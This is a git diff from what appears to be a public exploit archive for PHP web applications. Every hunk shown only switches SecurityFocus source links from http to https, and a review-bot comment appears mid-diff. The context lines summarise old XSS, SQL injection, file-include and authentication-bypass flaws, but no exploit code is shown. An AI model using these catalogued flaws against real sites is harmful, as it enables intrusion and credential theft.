@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10281/info +source: https://www.securityfocus.com/bid/10281/info It has been reported that Simple Machines Forum (SMF) may be prone to an HTML injection vulnerability that may allow an attacker to execute arbitrary HTML or script code in a user's browser. The issue exists due to insufficient sanitization of user-supplied input via the font size attribute. diff --git a/exploits/php/webapps/24083.txt b/exploits/php/webapps/24083.txt index 7fb8a9ac1..1aaa75b8e 100644 --- a/exploits/php/webapps/24083.txt +++ b/exploits/php/webapps/24083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10283/info +source: https://www.securityfocus.com/bid/10283/info It has been reported that PHPX is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24088.txt b/exploits/php/webapps/24088.txt index 2635fea8a..e4f760663 100644 --- a/exploits/php/webapps/24088.txt +++ b/exploits/php/webapps/24088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24089.txt b/exploits/php/webapps/24089.txt index c778a2a8a..27e6abcd5 100644 --- a/exploits/php/webapps/24089.txt +++ b/exploits/php/webapps/24089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. 
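Review bot: Every hunk in this run, including the PHPX entries 24088.txt and 24089.txt just above, is `@@ -1,4 +1,4 @@` and changes only the scheme of the `source:` URL on line 1, with the host, the BID path and the context lines left identical. With the same one-line change repeated across this many files, the commit message should record the exact substitution that produced it, if it does not already, for example a pattern anchored to the header such as `s|^source: http://www.securityfocus.com/|source: https://www.securityfocus.com/|`, so that a reviewer can reproduce the diff instead of reading each hunk. It would also help to spot-check that the https form of a few of these BID URLs resolves before merging.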
diff --git a/exploits/php/webapps/24090.txt b/exploits/php/webapps/24090.txt index 424c765e7..dd7e9f454 100644 --- a/exploits/php/webapps/24090.txt +++ b/exploits/php/webapps/24090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24091.txt b/exploits/php/webapps/24091.txt index 85419fe8c..cdeedc91a 100644 --- a/exploits/php/webapps/24091.txt +++ b/exploits/php/webapps/24091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24092.txt b/exploits/php/webapps/24092.txt index 459c34c59..a342292b2 100644 --- a/exploits/php/webapps/24092.txt +++ b/exploits/php/webapps/24092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24099.txt b/exploits/php/webapps/24099.txt index 11c70f672..5d418fdc7 100644 --- a/exploits/php/webapps/24099.txt +++ b/exploits/php/webapps/24099.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10306/info +source: https://www.securityfocus.com/bid/10306/info It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24100.txt b/exploits/php/webapps/24100.txt index 192eed776..a11faf0a0 100644 --- a/exploits/php/webapps/24100.txt +++ b/exploits/php/webapps/24100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10306/info +source: https://www.securityfocus.com/bid/10306/info It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24104.txt b/exploits/php/webapps/24104.txt index 818a4ab30..018c3b524 100644 --- a/exploits/php/webapps/24104.txt +++ b/exploits/php/webapps/24104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10314/info +source: https://www.securityfocus.com/bid/10314/info Reportedly Tutorials Manager is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24124.txt b/exploits/php/webapps/24124.txt index e61fd812d..7ccb11dc9 100644 --- a/exploits/php/webapps/24124.txt +++ b/exploits/php/webapps/24124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10362/info +source: https://www.securityfocus.com/bid/10362/info A weakness has been reported to exist in the VBulletin software that may allow an attacker to spoof parts of the VBulletin interface. The issue exists due to improper validation of user-supplied data. diff --git a/exploits/php/webapps/24126.txt b/exploits/php/webapps/24126.txt index 2d3f24de6..3ef56abc8 100644 --- a/exploits/php/webapps/24126.txt 
+++ b/exploits/php/webapps/24126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10364/info +source: https://www.securityfocus.com/bid/10364/info osCommerce has a directory-traversal vulnerability that allows a remote attacker to possibly obtain sensitive information. The software improperly sanitizes user-supplied input and allows '../' directory-traversal character sequences when serving files. diff --git a/exploits/php/webapps/24127.txt b/exploits/php/webapps/24127.txt index aa8562714..5aab08b4c 100644 --- a/exploits/php/webapps/24127.txt +++ b/exploits/php/webapps/24127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10365/info +source: https://www.securityfocus.com/bid/10365/info PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter. diff --git a/exploits/php/webapps/24131.txt b/exploits/php/webapps/24131.txt index 9a13fc54e..4d3479077 100644 --- a/exploits/php/webapps/24131.txt +++ b/exploits/php/webapps/24131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10381/info +source: https://www.securityfocus.com/bid/10381/info DSM Light has been reported to be prone to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24138.txt b/exploits/php/webapps/24138.txt index 0503ab79f..054ca20bf 100644 --- a/exploits/php/webapps/24138.txt +++ b/exploits/php/webapps/24138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10395/info +source: https://www.securityfocus.com/bid/10395/info It is reported that e107 website system is prone to a remote HTML injection vulnerability. This issue is due to a failure by the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/24151.txt b/exploits/php/webapps/24151.txt index 01db9e601..338190ab4 100644 --- a/exploits/php/webapps/24151.txt +++ b/exploits/php/webapps/24151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10430/info +source: https://www.securityfocus.com/bid/10430/info JPortal is reportedly affected by a remote SQL injection vulnerability in the print.inc.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input before using it in an SQL query. diff --git a/exploits/php/webapps/24152.txt b/exploits/php/webapps/24152.txt index 5e0c8c816..ab21412fe 100644 --- a/exploits/php/webapps/24152.txt +++ b/exploits/php/webapps/24152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10435/info +source: https://www.securityfocus.com/bid/10435/info Land Down Under is prone to an HTML injection vulnerability. This issue is exposed through their BBCode implementation. Exploitation could permit theft of cookie credentials, manipulation of content, or other attacks. diff --git a/exploits/php/webapps/24153.txt b/exploits/php/webapps/24153.txt index 8808150eb..fb3fafaba 100644 --- a/exploits/php/webapps/24153.txt +++ b/exploits/php/webapps/24153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10436/info +source: https://www.securityfocus.com/bid/10436/info e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties of a Web site running the software, including allowing remote attackers to execute malicious PHP code. diff --git a/exploits/php/webapps/24154.txt b/exploits/php/webapps/24154.txt index c2ad29742..0779500cd 100644 --- a/exploits/php/webapps/24154.txt +++ b/exploits/php/webapps/24154.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10436/info +source: https://www.securityfocus.com/bid/10436/info e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties of a Web site running the software, including allowing remote attackers to execute malicious PHP code. diff --git a/exploits/php/webapps/24166.txt b/exploits/php/webapps/24166.txt index ad9adf534..18007c6b3 100644 --- a/exploits/php/webapps/24166.txt +++ b/exploits/php/webapps/24166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10447/info +source: https://www.securityfocus.com/bid/10447/info PHP-Nuke is affected by a direct script access security vulnerability. This issue is due to a failure to properly validate the location and name of the file being accessed. diff --git a/exploits/php/webapps/24167.txt b/exploits/php/webapps/24167.txt index 820b47e0f..8c3854003 100644 --- a/exploits/php/webapps/24167.txt +++ b/exploits/php/webapps/24167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10450/info +source: https://www.securityfocus.com/bid/10450/info SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/php/webapps/24168.txt b/exploits/php/webapps/24168.txt index 018f6ec5e..501c5d259 100644 --- a/exploits/php/webapps/24168.txt +++ b/exploits/php/webapps/24168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10457/info +source: https://www.securityfocus.com/bid/10457/info Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers. 
diff --git a/exploits/php/webapps/24169.txt b/exploits/php/webapps/24169.txt index d17b34e88..d885d607d 100644 --- a/exploits/php/webapps/24169.txt +++ b/exploits/php/webapps/24169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10463/info +source: https://www.securityfocus.com/bid/10463/info CSLH is prone to multiple HTML injection vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data. The problem presents itself in various modules of the application and can allow remote attackers to inject HTML code into the name field and in chat sessions for live help. diff --git a/exploits/php/webapps/24172.txt b/exploits/php/webapps/24172.txt index d54b12386..bdfbf0622 100644 --- a/exploits/php/webapps/24172.txt +++ b/exploits/php/webapps/24172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10468/info +source: https://www.securityfocus.com/bid/10468/info cPanel is prone to a vulnerability that can allow a remote authenticated administrator to delete customer account DNS information for customers that are not administered by that administrator. This attack can allow an attacker to cause a denial of service condition against vulnerable Web sites. diff --git a/exploits/php/webapps/24176.txt b/exploits/php/webapps/24176.txt index 14058bb0d..7de5a8a33 100644 --- a/exploits/php/webapps/24176.txt +++ b/exploits/php/webapps/24176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10483/info +source: https://www.securityfocus.com/bid/10483/info SurgeMail/WebMail is prone to multiple vulnerabilities. These issue result from insufficient sanitization of user-supplied data. The issues can allow an attacker to carry out path disclosure and cross-site scripting attacks. diff --git a/exploits/php/webapps/24177.txt b/exploits/php/webapps/24177.txt index f5ab2da46..9a970219b 100644 --- a/exploits/php/webapps/24177.txt +++ b/exploits/php/webapps/24177.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10483/info +source: https://www.securityfocus.com/bid/10483/info SurgeMail/WebMail is prone to multiple vulnerabilities. These issue result from insufficient sanitization of user-supplied data. The issues can allow an attacker to carry out path disclosure and cross-site scripting attacks. diff --git a/exploits/php/webapps/24183.txt b/exploits/php/webapps/24183.txt index 3070fc27b..f821ca53b 100644 --- a/exploits/php/webapps/24183.txt +++ b/exploits/php/webapps/24183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10505/info +source: https://www.securityfocus.com/bid/10505/info cPanel is reportedly affected by a remote SQL injection vulnerability in the passwd script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24186.txt b/exploits/php/webapps/24186.txt index b507758ab..696976e8c 100644 --- a/exploits/php/webapps/24186.txt +++ b/exploits/php/webapps/24186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10511/info +source: https://www.securityfocus.com/bid/10511/info Invision Power Board is reported prone to an SQL injection vulnerability in its 'ssi.php' script. diff --git a/exploits/php/webapps/24191.txt b/exploits/php/webapps/24191.txt index e89a7fce7..6d32a5f1e 100644 --- a/exploits/php/webapps/24191.txt +++ b/exploits/php/webapps/24191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24192.txt b/exploits/php/webapps/24192.txt index a9fe2dbd0..fa490f414 100644 --- a/exploits/php/webapps/24192.txt +++ b/exploits/php/webapps/24192.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24193.txt b/exploits/php/webapps/24193.txt index aabd21b55..24575924b 100644 --- a/exploits/php/webapps/24193.txt +++ b/exploits/php/webapps/24193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24194.txt b/exploits/php/webapps/24194.txt index 8083fc93f..ce59b38d5 100644 --- a/exploits/php/webapps/24194.txt +++ b/exploits/php/webapps/24194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24199.txt b/exploits/php/webapps/24199.txt index 1416cd1f4..ade115b76 100644 --- a/exploits/php/webapps/24199.txt +++ b/exploits/php/webapps/24199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10539/info +source: https://www.securityfocus.com/bid/10539/info Invision Power Board 'ssi.php' script reported prone to a cross-site scripting vulnerability. The issue presents itself due to a lack of sufficient sanitization performed by functions in the 'ssi.php' script on user-influenced 'f' parameter. This can permit the theft of cookie-based authentication credentials; other attacks may also be possible. 
diff --git a/exploits/php/webapps/24212.txt b/exploits/php/webapps/24212.txt index 2ffa91b1e..6e62cd200 100644 --- a/exploits/php/webapps/24212.txt +++ b/exploits/php/webapps/24212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10553/info +source: https://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the module_db.php script. This issue is due to a failure of the application to properly sanitize user-supplied input before including it as a parameter to a file include function call. diff --git a/exploits/php/webapps/24215.txt b/exploits/php/webapps/24215.txt index f5808391e..742012dfc 100644 --- a/exploits/php/webapps/24215.txt +++ b/exploits/php/webapps/24215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10556/info +source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24216.html b/exploits/php/webapps/24216.html index ba700498e..8a0bce510 100644 --- a/exploits/php/webapps/24216.html +++ b/exploits/php/webapps/24216.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10556/info +source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24217.txt b/exploits/php/webapps/24217.txt index d47ee75df..fe274a1b8 100644 --- a/exploits/php/webapps/24217.txt +++ b/exploits/php/webapps/24217.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10556/info +source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24225.php b/exploits/php/webapps/24225.php index 8af07ffd0..4e7ada9c0 100644 --- a/exploits/php/webapps/24225.php +++ b/exploits/php/webapps/24225.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10586/info +source: https://www.securityfocus.com/bid/10586/info osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location. diff --git a/exploits/php/webapps/24227.txt b/exploits/php/webapps/24227.txt index 9076ba006..ef130cec6 100644 --- a/exploits/php/webapps/24227.txt +++ b/exploits/php/webapps/24227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10588/info +source: https://www.securityfocus.com/bid/10588/info SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/php/webapps/24231.txt b/exploits/php/webapps/24231.txt index e6bc1217a..0ac3909c7 100644 --- a/exploits/php/webapps/24231.txt +++ b/exploits/php/webapps/24231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10592/info +source: https://www.securityfocus.com/bid/10592/info It is reported that ArbitroWeb is susceptible to a cross-site scripting vulnerability in its rawURL URI parameter. diff --git a/exploits/php/webapps/24232.txt b/exploits/php/webapps/24232.txt index 74d9073b2..e5c0476ae 100644 --- a/exploits/php/webapps/24232.txt 
+++ b/exploits/php/webapps/24232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10595/info +source: https://www.securityfocus.com/bid/10595/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting, HTML injection, and SQL injection attacks. diff --git a/exploits/php/webapps/24234.html b/exploits/php/webapps/24234.html index 62e6f4dba..d86e79b49 100644 --- a/exploits/php/webapps/24234.html +++ b/exploits/php/webapps/24234.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10602/info +source: https://www.securityfocus.com/bid/10602/info VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts. diff --git a/exploits/php/webapps/24235.txt b/exploits/php/webapps/24235.txt index 5446585a7..2f5ff0d0e 100644 --- a/exploits/php/webapps/24235.txt +++ b/exploits/php/webapps/24235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10605/info +source: https://www.securityfocus.com/bid/10605/info Newsletter ZWS is reported prone to an administrative interface authentication bypass vulnerability. The vulnerability exists due to a design error in the implementation of the authentication system for the interface. The flaw allows a user to set their privileges through a URI parameter passed to the 'admin.php' script. diff --git a/exploits/php/webapps/24238.txt b/exploits/php/webapps/24238.txt index 39afb6405..44a7c84e1 100644 --- a/exploits/php/webapps/24238.txt +++ b/exploits/php/webapps/24238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10620/info +source: https://www.securityfocus.com/bid/10620/info It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. 
diff --git a/exploits/php/webapps/24239.txt b/exploits/php/webapps/24239.txt index 02964e902..30e47bfd2 100644 --- a/exploits/php/webapps/24239.txt +++ b/exploits/php/webapps/24239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10620/info +source: https://www.securityfocus.com/bid/10620/info It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24240.txt b/exploits/php/webapps/24240.txt index f7adfbc26..a69105527 100644 --- a/exploits/php/webapps/24240.txt +++ b/exploits/php/webapps/24240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10620/info +source: https://www.securityfocus.com/bid/10620/info It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24241.txt b/exploits/php/webapps/24241.txt index c9b8b2039..6c90975f2 100644 --- a/exploits/php/webapps/24241.txt +++ b/exploits/php/webapps/24241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10622/info +source: https://www.securityfocus.com/bid/10622/info PowerPortal is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24255.txt b/exploits/php/webapps/24255.txt index 214ef689d..29067c9ce 100644 --- a/exploits/php/webapps/24255.txt +++ b/exploits/php/webapps/24255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10670/info +source: https://www.securityfocus.com/bid/10670/info JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: 
diff --git a/exploits/php/webapps/24256.php b/exploits/php/webapps/24256.php index 996e3da71..0bc87c2ca 100644 --- a/exploits/php/webapps/24256.php +++ b/exploits/php/webapps/24256.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10670/info +source: https://www.securityfocus.com/bid/10670/info JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24257.txt b/exploits/php/webapps/24257.txt index 3980295fd..23109d528 100644 --- a/exploits/php/webapps/24257.txt +++ b/exploits/php/webapps/24257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10670/info +source: https://www.securityfocus.com/bid/10670/info JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24274.pl b/exploits/php/webapps/24274.pl index 6cba4d17f..57a457570 100755 --- a/exploits/php/webapps/24274.pl +++ b/exploits/php/webapps/24274.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10701/info +source: https://www.securityfocus.com/bid/10701/info The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamically generated web pages. diff --git a/exploits/php/webapps/24279.txt b/exploits/php/webapps/24279.txt index d8c0580b3..ec665974e 100644 --- a/exploits/php/webapps/24279.txt +++ b/exploits/php/webapps/24279.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10718/info +source: https://www.securityfocus.com/bid/10718/info It is reported that Moodle is susceptible to a cross-site scripting vulnerability in the 'help.php' script. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24289.c b/exploits/php/webapps/24289.c index 7f3c7b0b1..0ceed8257 100644 --- a/exploits/php/webapps/24289.c +++ b/exploits/php/webapps/24289.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10746/info +source: https://www.securityfocus.com/bid/10746/info Kleinanzeigen is prone to a file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24290.txt b/exploits/php/webapps/24290.txt index 63355a7b8..f11fc821e 100644 --- a/exploits/php/webapps/24290.txt +++ b/exploits/php/webapps/24290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10750/info +source: https://www.securityfocus.com/bid/10750/info CutePHP is reported prone to an HTML injection vulnerability. diff --git a/exploits/php/webapps/24291.txt b/exploits/php/webapps/24291.txt index ea57f5e01..db8d549c8 100644 --- a/exploits/php/webapps/24291.txt +++ b/exploits/php/webapps/24291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10756/info +source: https://www.securityfocus.com/bid/10756/info Outblaze Webmail is reported prone to an-HTML injection vulnerability because the application fails to properly sanitize user-supplied HTML email content. diff --git a/exploits/php/webapps/24292.txt b/exploits/php/webapps/24292.txt index e057645eb..aa36c6873 100644 --- a/exploits/php/webapps/24292.txt +++ b/exploits/php/webapps/24292.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10757/info +source: https://www.securityfocus.com/bid/10757/info Print Topic Mod is reportedly affected by a remote SQL injection vulnerability in the 'printview.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24296.txt b/exploits/php/webapps/24296.txt index fe532d294..d99e07512 100644 --- a/exploits/php/webapps/24296.txt +++ b/exploits/php/webapps/24296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10760/info +source: https://www.securityfocus.com/bid/10760/info Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24301.html b/exploits/php/webapps/24301.html index b392f8d04..fea75dadf 100644 --- a/exploits/php/webapps/24301.html +++ b/exploits/php/webapps/24301.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10774/info +source: https://www.securityfocus.com/bid/10774/info It has been reported that Mensajeitor Tag Board is affected by an authentication bypass vulnerability. This issue is due to a failure of the application to properly handle authentication controls. diff --git a/exploits/php/webapps/24303.txt b/exploits/php/webapps/24303.txt index 2bb35b1c8..3ed9582e4 100644 --- a/exploits/php/webapps/24303.txt +++ b/exploits/php/webapps/24303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10776/info +source: https://www.securityfocus.com/bid/10776/info It is reported that HelpBox is susceptible to multiple SQL injection vulnerabilities. This issue is due to improper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24306.txt b/exploits/php/webapps/24306.txt index 7675d7369..bff7121ef 100644 
--- a/exploits/php/webapps/24306.txt +++ b/exploits/php/webapps/24306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10792/info +source: https://www.securityfocus.com/bid/10792/info EasyWeb is prone to a directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. The issue occurs if a remote attacker sends a request to the 'ew_filemanager' script for a file containing directory traversal character sequences to the application. diff --git a/exploits/php/webapps/24307.txt b/exploits/php/webapps/24307.txt index ccd3066b1..64a4b3db0 100644 --- a/exploits/php/webapps/24307.txt +++ b/exploits/php/webapps/24307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10793/info +source: https://www.securityfocus.com/bid/10793/info It is reported that PostNuke may disclose administrator authentication credentials to remote attackers. This issue presents itself because the application fails to remove the install script 'install.php' after installation. This can allow an attacker to gain unauthorized access to the content management system. The attacker may then carry out further attacks against other users or the computer running the vulnerable application. diff --git a/exploits/php/webapps/24311.txt b/exploits/php/webapps/24311.txt index f36b48d96..9b2900c0a 100644 --- a/exploits/php/webapps/24311.txt +++ b/exploits/php/webapps/24311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10795/info +source: https://www.securityfocus.com/bid/10795/info EasyIns Stadtportal is reported prone to a vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24324.txt b/exploits/php/webapps/24324.txt index 1597c55f7..bf3119e1e 100644 --- a/exploits/php/webapps/24324.txt +++ b/exploits/php/webapps/24324.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10802/info +source: https://www.securityfocus.com/bid/10802/info PostNuke is reported prone to a cross-site scripting vulnerability. This issue affects the 'title' parameter of 'Reviews' script. Exploitation of this issue could allow for theft of cookie-based authentication credentials. Other attacks are also possible. diff --git a/exploits/php/webapps/24329.txt b/exploits/php/webapps/24329.txt index a3c2de18f..f57bb3b67 100644 --- a/exploits/php/webapps/24329.txt +++ b/exploits/php/webapps/24329.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10821/info +source: https://www.securityfocus.com/bid/10821/info Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/24330.txt b/exploits/php/webapps/24330.txt index 161473cd2..74e95a64f 100644 --- a/exploits/php/webapps/24330.txt +++ b/exploits/php/webapps/24330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10821/info +source: https://www.securityfocus.com/bid/10821/info Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/24331.txt b/exploits/php/webapps/24331.txt index 415bf7641..f4ca8c0c2 100644 --- a/exploits/php/webapps/24331.txt +++ b/exploits/php/webapps/24331.txt 
